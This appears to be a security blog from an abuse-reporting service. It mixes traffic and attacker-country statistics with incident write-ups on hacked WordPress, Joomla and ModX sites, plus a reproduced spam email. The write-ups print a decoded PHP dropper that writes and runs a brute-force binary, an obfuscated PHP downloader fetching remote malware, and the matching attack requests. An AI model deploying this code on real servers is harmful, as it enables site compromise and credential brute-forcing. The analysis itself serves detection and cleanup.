2010
04.23

Der Blog von www.blocklist.de wird hauptsächlich zum archivieren von Statistiken verwendet.

Wenn es mal was interessantes gibt, wird dies hier veröffentlicht. Dazu gehört z.B. neue Angriffe oder Wellen von neue Muster oder wenn eine Art von Angriffen einem Bot-Netz oder einem Wurm zugeordnet werden konnte.

-google-ads-
2016
01.03

In the last Days, we see a lot of hacked WordPress/Joomla-Sites, which makes outgoing BruteForce-Login Attacks to other WordPress-Sites.

The Attackers create some Files with the name libso48.php, libso47.php, libso46.php and call them over GET-Requests with Parameter id:

domain.tld/directory/xxx/xxx/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC

The using UserAgent is with the String „–user-agent“:

" --user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"

 

The bad files check if the Server runs at x32 or x64 and compile a file libworker.so

The libworker.so File makes the attacks.

 

Code from the libso48.php (decoded):

<?php
header("Content-type: text/plain");
if (!function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (!$f) return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}
//@system("killall -9 ".basename("libworker.so"));
$so32 = Hex-Code;
$so64 = Hex-Code;
//hexcode decoded start
............
fork
INFO Started brute forcing.

path=/wp-content/pluginsINFO SUCCESS: %s
<!DOCTYPE html<ERROR> (%s:%d: errno: %s) 
can not determine logged in or not.
INFO exit status: %d
........
<ERROR> (%s:%d: errno: %s) 
Error.
<INFO> (%s:%d: errno: %s) 
Started xml rpc brute force
.........
//hexcode decoded end
 
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
print "Arch is ".$arch."
";
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
    $n = unpack("C*", fread($f, 8));
    $so[7] = sprintf("%c", $n[8]);
    print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."
";
    fclose($f);
}
print "SO dumped ".file_put_contents("./libworker", $so)."
";
@chmod("libworker", 0777);
//@system("./libworker " . $_GET['id'] . " > /dev/null 2> /dev/null &");
@system("./libworker " . $_GET['id'] . " " . $_GET['a'] . " > out 2> err &");
exit(0);
?>

The complete Script is decoded under unphp.net (but with the decoded hex code):
http://www.unphp.net/decode/9f6f7e9085045418857e6b54e07b20e9/

On the Hexcode, which was written in the libworker.so file had the following code inside:

......

%s
}{
  "type" : "WPBF_RESPONSE",
  "success" : false,
  "site" : "%s",
  "user" : "%s"
}
Sending: %s
{
  "type" : "WPBF_RESPONSE",
  "success" : true,
  "site" : "%s",
  "user" : "%s",
  "pass" : "%s"
}
{}curlhttp://https://%swp-login.php%s/wp-login.phphttp://%swp-login.phphttp://%s/wp-login.phplog=%s&pwd=%s&wp-submit=Log+In&redirect_to=http%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1log=%s&pwd=%s&wp-submit=Log+In&redirect_to=https%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1--user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0--dataCookie:wordpress_test_cookie=WP+Cookie+check-HContent-Type:application/x-www-form-urlencodedCache-Control:max-age=0Accept-Language:en-US;Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8-A-iINFO checking: %s, %s, %s
Success./src/wpbf/bf.c<ERROR> (%s:%d: errno: %s) 

You can see always, the Attacker use curl and Makes xmlrpc-BruteForce and normal wp-login.php WordPressBruteForce-Logins.

If you found the libso48.php or libworker.so File in your Webspace, please check, clean and update your software and stop running processes from libworker file.

-google-ads-
2015
03.06

The Traffic, Load, Users and other Statistics of blocklist.de for the Month 02.2015

 

Currently, blocklist.de has the following Stats/User:

User: 2,144

Server: 2,325

Attacks: 246,084,421 since 01.01.2014

Reports: 10,092,816 since 2012

Daily Mails: ~690,500 (lower limit) ~1,450,000 (high limit)

Web-Traffic: ~309 GB

RBL-/API-Traffic: ~85 GB

Mail (In/Out)-Traffic: ~~3,528 GB

Traffic over IPv6 (Mail, Web..): ~5GB

To this data, there comes 6,4TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~8,5 GB each Hour out.

The Mysql-Server use now 62% from 32GB Ram (~14gb Cache). And the System-Load is in average on 1.10 .

The WebServer is using not full of 12GB Ram and the System-Load is under 0,7. The open Connections are ~25,000 on the same time

 

The complete Traffic from all Systems are round about 6,6TB in 02/2015 (the Traffic from MySQL-Server over the not public IPs is not included).

-google-ads-
2015
03.06

Statistics for 10/2014.

 

The Image (Up, down, same….) is the different from 10/2014 (last statistics):

 

Die Pfeile ist die Position zum Vormonat (gestiegen, gefallen, gleich geblieben).

Nach IP-Adressen sortiert (unique):

  1. 30324 CN
  2. 10486 RU
  3. 9775 US
  4. 9012 NoName
  5. 8925 TW
  6. 7083 UA
  7. 4876 VE
  8. 6421 VN
  9. 4980 IN
  10. 4824 AT

Sortiert nach Anzahl der Angriffe:

  1. 9278162 CN
  2. 4358200 PL
  3. 3860007 UA
  4. 2058265 NoName
  5. 596001 FR
  6. 430084 US
  7. 248110 RU
  8. 48762 DE
  9. 34456 NoASN
  10. 29661 SE
-google-ads-
2015
03.06

After 2 Years, we try to regenerate the Statistics over the countries from month to month again.

 

The Image (Up, down, same….) is the different from 09/2014 (last statistics):

 

Die Pfeile ist die Position zum Vormonat (gestiegen, gefallen, gleich geblieben).

Nach IP-Adressen sortiert (unique):

  1. 28650 CN
  2. 19957 VN
  3. 13776 RU
  4. 9309 US
  5. 7571 IN
  6. 6262 NoName
  7. 4876 VE
  8. 4743 UA
  9. 4633 TW
  10. 4054 BR

Sortiert nach Anzahl der Angriffe:

  1. 8164637 CN
  2. 4269205 PL
  3. 2593427 UA
  4. 1841862 US
  5. 906412 FR
  6. 715298 NoName
  7. 186913 RU
  8. 41671 VN
  9. 27603 NoASN
  10. 20123 IQ
-google-ads-
2014
10.10

The Traffic, Load, Users and other Statistics of blocklist.de for the Month 09.2014

 

Currently, blocklist.de has the following Stats/User:

User: 1,719

Server: 1,932

Attacks: 282,138,414   since 05.05.2013

Reports: 8,572,275 since 2012

Daily Mails: ~750,400 (lower limit) ~1,250,000 (high limit)

Web-Traffic: ~290 GB

RBL-/API-Traffic: ~80 GB

Mail (In/Out)-Traffic: ~~3,315 GB

Traffic over IPv6 (Mail, Web..): ~5GB

To this data, there comes 6,1TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~8,4 GB each Hour out.

The Mysql-Server use now 60% from 32GB Ram (~14gb Cache). And the System-Load is in average on 2.40 .

The WebServer is using not full of 12GB Ram and the System-Load is under 0,6. The open Connections are ~23,000 on the same time

 

The complete Traffic from all Systems are round about 6,4TB in 09/2014 (the Traffic from MySQL-Server over the not public IPs is not included).

-google-ads-
2014
10.09

After 2 Years, we try to regenerate the Statistics over the countries from month to month again.

 

The Image (Up, down, same….) is the different from 2012 (last statistics):

 

Die Pfeile ist die Position zum Vormonat (gestiegen, gefallen, gleich geblieben).

Nach IP-Adressen sortiert (unique):

  1. 29182 CN
  2. 12068 VN
  3. 10280 IN
  4. 8157 US
  5. 7082 RU
  6. 14573 VN
  7. 5651 NoName
  8. 5216 VE
  9. 4054 BR
  10. 3986 UA

Sortiert nach Anzahl der Angriffe:

  1. 7805582 CN
  2. 6300587 US
  3. 1752518 US
  4. 1533083 PL
  5. 678569 NoName
  6. 537431 FR
  7. 175161 RU
  8. 35833 AT
  9. 35048 DE
  10. 32085 NoASN
-google-ads-
2014
09.17

I have some sites with outdated Software for a other Project.
Normally, the Site was secured with a .htaccess File. All Sites was secured by Quotas and other Tools and also monitored (sha1-filehash Checker, Processlist Checker…).

Two sites was now hacked, because the .htaccess was temporarily disabled and forgotten to reactivated.

Then there comes the following Requests to a outdated ModEvelution-Software:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx
"" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

The Post Variables was:
POST['n132a88'] = "ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7";
decoded it is only:
echo „qq11oadnq98cjnwejioln23++“;

A other Request was:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

A other Request was:

85.143.166.103 - - [07/Aug/2014:02:53:59 +0200] "POST http://ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7/assets/cache/docid_685.pageCache.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"

POST[„n0b8385“] = „JHMzOD0iV25cXGlhKm9tPX1ZVUJqd1EmZy1TTE1xXi90OlB+XHRkVFpdJzgoeGtARFwkMyMxXG4uNl9OaFIrWzl5cztDfGwhYiU1SWY0MkhPcEp1MEc8KVZgRlxye1gsRT5LXCJlY3pyIDdBdj8iOyAkR0xPQkFMU1sneHRrenA5NCddID0gJHMzOFs3MV0uJHMzOFs1MF0uJHMzOFs3MV0uJHMzOFs0OF0uJHMzOFs3M10uJHMzOFsxXS4kczM4WzRdLiRzMzhbN10uJHMzOFs4OV07ICRHTE9CQUxTWydmamlpYjUxJ10gPSAkczM4WzY2XS4kczM4WzczXS4kczM4WzFdLiRzMzhbOTBdLiRzMzhbMjVdLiRzMzhbM10uJHMzOFs2X
….
……
….
bGNyNTgnXSgkczM4LCAkczM4WzQ2XS4kczM4WzI0XS4kbnF3cnMwLCAkcHBvcWI0NykgPT0gRkFMU0UpIHsJCWlmICgkR0xPQkFMU1snandsY3I1OCddKCRzMzgsICRzMzhbMjRdLiRzMzhbMjVdLiRzMzhbN10uJHMzOFs3MV0uJHMzOFsyNF0uJG5xd3JzMCwgJHBwb3FiNDcpID09IEZBTFNFKSB7CQkJcmV0dXJuIEZBTFNFOwkJfSBlbHNlIHsJCQlyZXR1cm4gJHMzOFsyNF0uJHMzOFsyNV0uJHMzOFs3XS4kczM4WzcxXS4kczM4WzI0XS4kbnF3cnMwOwkJfQl9IGVsc2UgewkJcmV0dXJuICRzMzhbNDZdLiRzMzhbMjRdLiRucXdyczA7CX0JcmV0dXJuIEZBTFNFO30=“;

Decoded the sending Post Variable was:

$s38="Wn\\ia*om=}YUBjwQ&g-SLMq^/t:P~\tdTZ]'8(xk@D\$3#1\n.6_NhR+[9ys;C|l!b%5If42HOpJu0G< )V`F\r{X,E>K\"eczr 7Av?";
$GLOBALS['xtkzp94'] = $s38[71].$s38[50].$s38[71].$s38[48].$s38[73].$s38[1].$s38[4].$s38[7].$s38[89];
$GLOBALS['fjiib51'] = $s38[66].$s38[73].$s38[1].$s38[90].$s38[25].$s38[3].$s38[6].$s38[1].$s38[48].$s38[89].$s38[37].$s38[3].$s38[56].$s38[25].$s38[56];
$GLOBALS['aojaf86'] = $s38[56].$s38[25].$s38[92].$s38[60].$s38[89].$s38[1];

… Truncat against Kaspersky says it is an Virus…. aaaaaahhhhhhhh

=$s38[50].$s38[25].$s38[25].$s38[71].$s38[26].$s38[24].$s38[24].$s38[1].$s38[6].$s38[25].$s38[89].$s38[56].$s38[46].$s38[4].$s38[92].$s38[25].$s38[18].$s38[71].$s38[4].$s38[92].$s38[25].$s38[1].$s38[89].$s38[92].$s38[46].$s38[1].$s38[89].$s38[25].$s38[24].$s38[56].$s38[7].$s38[47].$s38[67];
$zxozz28 = $s38[83].$s38[40].$s38[78].$s38[19].$s38[49].$s38[48].$s38[19].$s38[85].$s38[19].$s38[19].$s38[65].$s38[70].$s38[49].$s38[48].$s38[58].$s38[70].$s38[70].$s38[87].$s38[65].$s38[85].$s38[8].$s38[27].$s38[1].$s38[72].$s38[37].$s38[27].$s38[40].$s38[21].$s38[55].$s38[27].$s38[3].$s38[44].$s38[55].$s38[90].$s38[31].$s38[14].$s38[52].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[75].$s38[37].$s38[73].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[13].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[40].$s38[64].$s38[42].$s38[90].$s38[69].$s38[65].$s38[35].$s38[70].$s38[13].$s38[65].$s38[91].$s38[49].$s38[31].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[55].$s38[27].$s38[40].$s38[64].$s38[73].$s38[30].$s38[13].$s38[14].$s38[42].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[68].$s38[27].$s38[40].$s38[64].$s38[73].$s38[10].$s38[31].$s38[14].$s38[91].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[50].$s38[27].$s38[40].$s38[64].$s38[17].$s38[90].$s38[31].$s38[14].$s38[14].$s38[21].$s38[13].$s38[67].$s38[25].$s38[10].$s38[69].$s38[85].$s38[35].$s38[27].$s38[7].$s38[64].$s38[42].$s38[27].$s38[75].$s38[71].$s38[68].$s38[30].$s38[1].$s38[65].$s38[67].$s38[20].$s38[19].$s38[44].$s38[13].$s38[10].$s38[0].$s38[80].$s38[37].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[74].$s38[52].$s38[20].$s38[0].$s38[64].$s38[42].$s38[27].$s38[40].$s38[64].$s38[17].$s38[30].$s38[91].$s38[37].$s38[22].$s38[30].$s38[1].$s38[32].$s38[55].$s38[70].$s38[58].$s38[74].$s38[25].$s38[10].$s38[75].$s38[49].$s38[68].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[44].$s38[13].$s38[10].$s38[91].$s38[95].$s38[56].$s38[90].$s38[7].$s38[71].$s38[55].$s38[27].$s38[3].$s38[44].$s38[17].$s38[30].$s38[91].$s38[14].$s38[52].$s38[90].$s38[83].$s38[90].$s38[35].$s38[4].$s38[1].$s38[32].$s38[68].$s38[90].$s38[13].$s38[17].$s38[25].$s38[20].$s38[83].$s38[80].$s38[68].$s38[10].$s38[42].$s38[32].$s38[37].$s38[20].$s38[69].$s38[49].$s38[42].$s38[32].$s38[42].$s38[12].$s38[94].$s38[20].$s38[42].$s38[72].$s38[13].$s38[90].$s38[69].$s38[10].$s38[56].$s38[10].$s38[0].$s38[44].$s38[96].$s38[20].$s38[0].$s38[78].$s38[6].$s38[49].$s38[19].$s38[37].$s38[55].$s38[4].$s38[1].$s38[65].$s38[52].$s38[20].$s38[83].$s38[80].$s38[42].$s38[27].$s38[40].$s38[64].$s38[73].$s38[32].$s38[7].$s38[95].$s38[35].$s38[4].$s38[69].$s38[6].$s38[55].$s38[21].$s38[13].$s38[95].$s38[52].$s38[20].$s38[0].$s38[64].$s38[7].$s38[10].$s38[40].$s38[14].$s38[8];
$ntgai94 = $GLOBALS['xtkzp94']($s38[56]);
$igekj52 = $GLOBALS['xtkzp94']($s38[7]);
echo $s38[76].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86];
for (;;)
{
if (!$GLOBALS['fjiib51']($s38[56].$s38[50].$s38[89].$s38[60].$s38[60].$s38[48].$s38[89].$s38[37].$s38[89].$s38[90]))
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[44].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[56].$s38[50].$s38[89].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[86];
break;
}
if ($ntgai94 !== $s38[20].$s38[3].$s38[1].$s38[73].$s38[37])
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[68].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[60].$s38[3].$s38[1].$s38[73].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$mqcjh70.$s38[86];
break;
}
$nneyn30 = $s38[71].$s38[56];
$cttgs64 = "";
if ($GLOBALS['aojaf86']($GLOBALS['dfyoo42'](~0)) == 64)
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[47].$s38[67].$s38[86];
$cttgs64 = $rmznz0;
}
else
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[42].$s38[68].$s38[86];
$cttgs64 = $dfdjy19;
}
$pjimj72 = "";
if (!$GLOBALS['gwigy41']($nneyn30))
{
$pjimj72 = $GLOBALS['vziql67']($s38, $cttgs64, $nneyn30);
if ( $pjimj72 == FALSE)
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[67].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[30].$s38[6].$s38[14].$s38[1].$s38[60].$s38[93].$s3... Truncat against Kaspersky says it is an Virus.... aaaaaahhhhhhhh
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[64].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[30].$s38[6].$s38[1].$s38[89].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[68].$s38[8].$cgthg36.$s38[86];
$GLOBALS['tkjre65'](1);
$GLOBALS['jtjiv94']($pjimj72);
break;
}
echo $s38[76].$s38[24].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86];

function fildv12($s38, $htxbt38)
{
$ppoqb47 = „“;
$ogrpt28 = @$GLOBALS[‚fjcva91‘]($htxbt38, $s38[92].$s38[62]);
if ($ogrpt28 == FALSE)
{
if (!$GLOBALS[‚fjiib51‘]($s38[90].$s38[73].$s38[92].$s38[60].$s38[48].$s38[3].$s38[1].$s38[3].$s38[25]))
return FALSE;
$henof76 = @$GLOBALS[‚dmrqg14′]();
@$GLOBALS[’npbou10′]($henof76, CURLOPT_URL, $htxbt38);
@$GLOBALS[’npbou10‘]($henof76, CURLOPT_RETURNTRANSFER, true);
$ppoqb47 = @$GLOBALS[‚hjiar61‘]($henof76);
@$GLOBALS[‚ekyyn43‘]($henof76);
}
else
{
while(!$GLOBALS[‚mashg65‘]($ogrpt28))
$ppoqb47.=$GLOBALS[‚udsvx59′]($ogrpt28, 1024 * 64 );
$GLOBALS[’naftp70‘]($ogrpt28);
}
return $ppoqb47;
}

function eghou87($s38, $yaxje72, $ppoqb47)
{
$negtx78 = $GLOBALS[‚fjcva91‘]($yaxje72, $s38[14].$s38[62].$s38[52]);
if ($negtx78 == FALSE)
{
if (!$GLOBALS[‚fjiib51‘]($s38[66].$s38[3].$s38[60].$s38[89].$s38[48].$s38[71].$s38[73].$s38[25].$s38[48].$s38[90].$s38[6].$s38[1].$s38[25].$s38[89].$s38[1].$s38[25].$s38[56]))
return FALSE;
if ( @$GLOBALS[‚wtxbv81‘]($yaxje72, $ppoqb47) === FALSE )
return FALSE;
}
else
{
$jznmi77 = $GLOBALS[‚acklf72‘]($negtx78, $ppoqb47, $GLOBALS[‚aojaf86′]($ppoqb47));
$GLOBALS[’naftp70‘]($negtx78);
if ($jznmi77 == FALSE || $jznmi77 != $GLOBALS[‚aojaf86‘]($ppoqb47))
return FALSE;
}
return TRUE;
}

function gbzrm90($s38, $htxbt38, $nqwrs0)
{
$ppoqb47 = $GLOBALS[‚adwwg63‘]($s38, $htxbt38);
if ($ppoqb47 == FALSE)
return FALSE;
if ($GLOBALS[‚jwlcr58‘]($s38, $s38[46].$s38[24].$nqwrs0, $ppoqb47) == FALSE)
{
if ($GLOBALS[‚jwlcr58‘]($s38, $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0, $ppoqb47) == FALSE)
{
return FALSE;
}
else
{
return $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0;
}
}
else
{
return $s38[46].$s38[24].$nqwrs0;
}
return FALSE;
}

A short lock shows, that the Code check with php_uname the System and downloads a xxxx64/xxxx32 File which was analysed from our Friends from MalwareMastDie under:
http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html

For more Informations and Updates, you can follow MalwareMustDie on Twitter:
https://twitter.com/MalwareMustDie


So, please update and secure all your sites and scripts!

If you have Questions, please contact us :-)

-google-ads-
2014
03.20

Today, we received a lot of Spammails like:

Presente para voce, consumidor: ate 60% off em pecas selecionadas
Você Merece o Melhor
Atencao, anapaula@pacaluz.com.br  Casas Bahia Informa como aprovado seu pedido n. 18977
Este vendedor ainda trabalha com você?

and other to our Postmaster-Address. Today it was over 1650 Mails.
We have report them over spamcop.net to the Abuse-Departments of the Source and the Abuse-Department from the Links in the Body of mails.
The most Spammails has in the Message-ID only @localhost.localdomain and used in the return-path Addresses like "bounce-xxx", "return-xxx" and other:

Return-Path: <return@baratomail4.com.br>
Delivered-To: root@blocklist.de
Received: by mail.blocklist.de (Postfix, from userid 1001)
	id 80DDE2F1B70; Thu, 20 Mar 2014 06:53:39 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de 80DDE2F1B70
Authentication-Results: mail.blocklist.de; dkim=permerror
	(verification error: empty key record; insecure key)
	header.i=abuse@baratomail4.com.br; dkim-adsp=none (insecure policy)
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
	server5.customer-config.de
X-Spam-Level: ****
X-Spam-ASN:  
X-Spam-Status: No, hits=4.4 required=5.5 tests=BAYES_00=-6.1,
	DATE_IN_PAST_06_12=1.543,HTML_IMAGE_RATIO_02=0.437,HTML_MESSAGE=0.001,
	MIME_HTML_ONLY=0.723,RCVD_IN_SBL=0.7,RDNS_NONE=0.793,URIBL_BLACK=1.725,
	URIBL_DBL_SPAM=1.7,URIBL_JP_SURBL=1.25,URIBL_WS_SURBL=1.608 bayes=0.0000
	relaysuntrusted=[ ip=2a01:4f8:150:74e2::4 rdns= helo=webserver2.blocklist.de
	by=mail.blocklist.de ident= envfrom= intl=0 id=3EED02F1A6A auth= msa=0 ] [
	ip=200.216.198.85 rdns=mx.grupotreviso.com.br helo=grupotreviso.com.br
	by=webserver2.blocklist.de ident= envfrom= intl=0 id=422901E400A0 auth= msa=0
	] [ ip=187.85.79.35 rdns= helo=rdns-6.baratomail4.com.br by=QA-Mail ident=
	envfrom= intl=0 id= auth= msa=0 ] autolearn=disabled scanned=[Thu, 20 Mar
	2014 06:53:39 +0100] version=3.3.1
Received: from webserver2.blocklist.de (unknown [IPv6:2a01:4f8:150:74e2::4])
	(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by mail.blocklist.de (Postfix) with ESMTPS id 3EED02F1A6A
	for <root@blocklist.de>; Thu, 20 Mar 2014 06:53:27 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de 3EED02F1A6A
Received: by webserver2.blocklist.de (Postfix, from userid 1000)
	id E13FF1E400A0; Thu, 20 Mar 2014 06:53:26 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 webserver2.blocklist.de E13FF1E400A0
Authentication-Results: webserver2.blocklist.de; dkim=permerror
	(verification error: empty key record; insecure key)
	header.i=abuse@baratomail4.com.br; dkim-adsp=none (insecure policy)
Received-SPF: none (baratomail4.com.br: No applicable sender policy available) receiver=webserver2.blocklist.de; identity=mailfrom; envelope-from="return@baratomail4.com.br"; helo=grupotreviso.com.br; client-ip=200.216.198.85
X-DKIM: OpenDKIM Filter v2.0.1 webserver2.blocklist.de 422901E400A0
Received: from grupotreviso.com.br (mx.grupotreviso.com.br [200.216.198.85])
	by webserver2.blocklist.de (Postfix) with SMTP id 422901E400A0
	for <postmaster@blocklist.de>; Thu, 20 Mar 2014 06:53:24 +0100 (CET)
X-Qamailsafe-Spam-Score: 99
X-QamailSafe-Checksum: d599ce04b77699878cd55c7db6dd10258f298098e6d9af032a8ba934ebd2cb5f
X-QamailSafe-Source-Addr: 187.85.79.35
Received: from 187.85.79.35 (EHLO rdns-6.baratomail4.com.br)
  by QA-Mail Safe 7.0.14; Thu, 20 Mar 2014 00:38:26 -0300
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=default; d=baratomail4.com.br;
 h=To:Subject:Message-ID:Date:From:Reply-To:MIME-Version:List-Unsubscribe:Content-Type:Content-Transfer-Encoding; i=abuse@baratomail4.com.br;
 bh=PL8mxp19/Mo2fJ7ycxAwI4XUbVc=;
 b=iU0HK1hDwSOSnC92NnJXgqAoNV/7UQtZMD0lsY8w5otEjd/s6cijPH7e8yy/EsviWMz6g/ligLCs
   cZIQFgUOOHJ50JmqbUq9Uc3VImqdlqF2iBnz6/LHa4e6h90ZX++YwDsxkA6d8ZaX1kaZxeS9cnb3
   tdhFtYxY5JrUk/BDG0E=
To: vas.sl@grupotreviso.com.br
Subject: =?UTF-8?B?Vm9jw6ogTWVyZWNlIG8gTWVsaG9y?=
Message-ID: <b3164728023c9761cb7ff3db18d1a3be@baratomail4.com.br>
Date: Wed, 19 Mar 2014 15:17:21 -0300
From: "Sabor e Estilo" <send@baratomail4.com.br>
Reply-To: send@baratomail4.com.br
MIME-Version: 1.0
X-Mailer-LID: 8,6,5
List-Unsubscribe: <http://baratomail4.com.br/unsubscribe.php?M=1289652&C=c3022500f5f5b55357bb0bd5b2bd14ba&L=5&N=22>
X-Mailer-RecptId: 1289652
X-Mailer-SID: 22
X-Mailer-Sent-By: 1
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: 8bit

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>O Melhor Vinho do mundo</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width" />
<style type="text/css">
@media only screen and (max-width:480px){
body {
	margin: 0 auto !important;
	padding: 0 auto !important;
}
table[class=omvm] { width: 300px !important; background-color:#FFFFFF
!important;}
table[class=omvm] td{ width: 300px !important; float:left !important;}
br[class=delete] {display:none !important;}
td[class=delete] {display:none !important;}
td[class=logo-omvm] img{ width: 300px !important; height: 98px !important;
float:left !important;}
td[class=accroche-omvm] img{ width: 300px !important; height: 111px
!important; float:left !important;}
td[class=visuel-omvm] img{ display:none !important;}
td[class=visuel-omvm] { width: 300px !important; height: 122px !important;
background-image:url("http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/visuel-m.jpg")!important;
background-size: 300px 122px !important; background-repeat:no-repeat
!important; float:left !important;}
td[class=visuel-omvm] a{ width: 300px !important; height: 122px !important;
display:block !important;}
td[class=texte-omvm] { width: 300px !important; height: 150px !important;
float:left !important; padding-top:15px !important; text-align:center
!important;}
td[class=btn-omvm] img{ display:none !important;}
td[class=btn-omvm] { width: 300px !important; height: 80px !important;
background-image:url("http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/btn-m.jpg")!important;
background-size: 300px 80px !important; background-repeat:no-repeat
!important; float:left !important;}
td[class=btn-omvm] a{ width: 300px !important; height: 80px !important;
display:block !important;}
td[class=mentions-omvm] { width: 300px !important; height: 20px !important;
float:left !important; text-align:center !important;}
}
</style>
</head>
<body bgcolor="#FFFFFF">
<center>
<table border="0" cellpadding="0" cellspacing="0"
style="width: 550px;">
<tbody>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/top.jpg"
width="550" height="180" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
